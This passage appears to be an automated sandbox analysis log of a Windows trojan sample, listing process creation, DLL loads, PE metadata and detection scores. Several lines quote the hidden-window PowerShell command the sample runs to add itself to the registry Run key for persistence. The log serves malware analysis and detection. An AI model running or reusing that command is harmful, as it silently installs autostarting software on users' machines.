    Source: powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess Stats: CPU usage > 49%
    Source: lDO4WBEQyL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal88.troj.evad.winEXE@9/6@1/2
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cn2nhad3.o55.ps1Jump to behavior
    Source: lDO4WBEQyL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: lDO4WBEQyL.exeVirustotal: Detection: 23%
    Source: lDO4WBEQyL.exeReversingLabs: Detection: 36%
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeFile read: C:\Users\user\Desktop\lDO4WBEQyL.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\lDO4WBEQyL.exe "C:\Users\user\Desktop\lDO4WBEQyL.exe"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\user\Desktop\lDO4WBEQyL.exe "C:\Users\user\Desktop\lDO4WBEQyL.exe"
    Source: unknownProcess created: C:\Users\user\Desktop\lDO4WBEQyL.exe "C:\Users\user\Desktop\lDO4WBEQyL.exe"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: lDO4WBEQyL.exeStatic file information: File size 8812032 > 1048576
    Source: lDO4WBEQyL.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x7d8400
    Source: lDO4WBEQyL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: lDO4WBEQyL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: lDO4WBEQyL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: lDO4WBEQyL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: lDO4WBEQyL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: lDO4WBEQyL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: lDO4WBEQyL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: lDO4WBEQyL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Admin\Workspace\1803121139\Project\Release\Project.pdb source: lDO4WBEQyL.exe
    Source: lDO4WBEQyL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: lDO4WBEQyL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: lDO4WBEQyL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: lDO4WBEQyL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: lDO4WBEQyL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Suspicious powershell command line found
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: lDO4WBEQyL.exeStatic PE information: section name: .fptable
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02D57913 push 8BF07D89h; iretd 4_2_02D57918
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
